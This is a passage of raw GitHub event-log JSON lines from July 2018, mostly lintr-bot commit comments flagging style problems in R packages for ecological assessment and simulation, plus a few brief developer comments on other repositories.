is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:485:1:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/inst/tests/testthat/test_berekenLSVIbasis.R#L485) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:486:1:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/inst/tests/testthat/test_berekenLSVIbasis.R#L486) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-18T15:46:51Z"}
{"id":"7983853984","type":"CommitCommentEvent","actor":{"login":"larroy"},"repo":{"name":"KellenSunderland/incubator-mxnet"},"payload":{"comment":{"id":29751794,"position":null,"line":null,"path":null,"commit_id":"bdd63481487c4d71e6dfaa5b1030c4773c399840","created_at":"2018-07-18T15:46:58Z","updated_at":"2018-07-18T15:46:58Z","author_association":"NONE","body":"I don't think we should run this on the Jenkinsfile, but as a part of system mainteinance like a cron job."}},"created_at":"2018-07-18T15:46:58Z"}
{"id":"7983855066","type":"CommitCommentEvent","actor":{"login":"Zhikh"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.05_06"},"payload":{"comment":{"id":29751795,"position":null,"line":null,"path":null,"commit_id":"ff312a7f606dadc98033bebd3941083bfa95f833","created_at":"2018-07-18T15:47:09Z","updated_at":"2018-07-18T15:47:09Z","author_association":"OWNER","body":"всё исправлено: https://github.com/Zhikh/NET.S.2018.Zhikh.05_06/commit/ef035b32d5d1e2f74e079472fec810f8708c99c6"}},"created_at":"2018-07-18T15:47:09Z"}
{"id":"7983858915","type":"CommitCommentEvent","actor":{"login":"GuangxuanZhou"},"repo":{"name":"GuangxuanZhou/hello-world"},"payload":{"comment":{"id":29751806,"position":null,"line":null,"path":null,"commit_id":"6f6a8f7b8abc5c27e9ab9628af7247a4a235096d","created_at":"2018-07-18T15:47:45Z","updated_at":"2018-07-18T15:47:45Z","author_association":"OWNER","body":"master"}},"created_at":"2018-07-18T15:47:45Z"}
{"id":"7983863427","type":"CommitCommentEvent","actor":{"login":"mimugmail"},"repo":{"name":"opnsense/plugins"},"payload":{"comment":{"id":29751813,"position":null,"line":null,"path":null,"commit_id":"1c00dfccd9239010674a98aba443daf48e3e8858","created_at":"2018-07-18T15:48:29Z","updated_at":"2018-07-18T15:48:29Z","author_association":"MEMBER","body":"it-sa is not too far away <3 Thanks!"}},"created_at":"2018-07-18T15:48:29Z"}
{"id":"7983863569","type":"CommitCommentEvent","actor":{"login":"gvalkov"},"repo":{"name":"ndreys/python-evdev"},"payload":{"comment":{"id":29751815,"position":null,"line":null,"path":null,"commit_id":"6ca47f29f1c9dc7295864efd1939e040af9dcac0","created_at":"2018-07-18T15:48:31Z","updated_at":"2018-07-18T15:48:31Z","author_association":"NONE","body":"Hi. These are some very good changes. Would you be interested in contributing them to python-evdev?"}},"created_at":"2018-07-18T15:48:31Z"}
{"id":"7983864932","type":"CommitCommentEvent","actor":{"login":"lpereira"},"repo":{"name":"lpereira/lwan"},"payload":{"comment":{"id":29751819,"position":null,"line":null,"path":null,"commit_id":"2619fd343cce08b113dee7aa8be5ef6a0425fc94","created_at":"2018-07-18T15:48:44Z","updated_at":"2018-07-18T15:48:44Z","author_association":"OWNER","body":"What do you mean by this?"}},"created_at":"2018-07-18T15:48:44Z"}
{"id":"7983866615","type":"CommitCommentEvent","actor":{"login":"GuangxuanZhou"},"repo":{"name":"GuangxuanZhou/hello-world"},"payload":{"comment":{"id":29751820,"position":2,"line":2,"path":"README.md","commit_id":"6f6a8f7b8abc5c27e9ab9628af7247a4a235096d","created_at":"2018-07-18T15:49:02Z","updated_at":"2018-07-18T15:49:02Z","author_association":"OWNER","body":"master"}},"created_at":"2018-07-18T15:49:02Z"}
{"id":"7983868642","type":"CommitCommentEvent","actor":{"login":"Gengkongsigelap"},"repo":{"name":"vichargrave/mau"},"payload":{"comment":{"id":29751823,"position":6,"line":5,"path":"mau.zsh-theme","commit_id":"dbaf0cf5cf303c137618c82ee169c128f4505736","created_at":"2018-07-18T15:49:23Z","updated_at":"2018-07-18T15:49:23Z","author_association":"NONE","body":"live"}},"created_at":"2018-07-18T15:49:23Z"}
{"id":"7983872124","type":"CommitCommentEvent","actor":{"login":"vincentdchan"},"repo":{"name":"v2land/v2land-redstone"},"payload":{"comment":{"id":29751831,"position":5,"line":197,"path":"api/controllers/EventController.js","commit_id":"dfedee3901f52da197a70d9c6009fdc104a79ca3","created_at":"2018-07-18T15:49:57Z","updated_at":"2018-07-18T15:49:57Z","author_association":"CONTRIBUTOR","body":"@incrediblink 很毒"}},"created_at":"2018-07-18T15:49:57Z"}
{"id":"7983873729","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29751833,"position":null,"line":null,"path":null,"commit_id":"83379f464daca88d3620793e44d448596aac0122","created_at":"2018-07-18T15:50:13Z","updated_at":"2018-07-18T15:50:13Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) 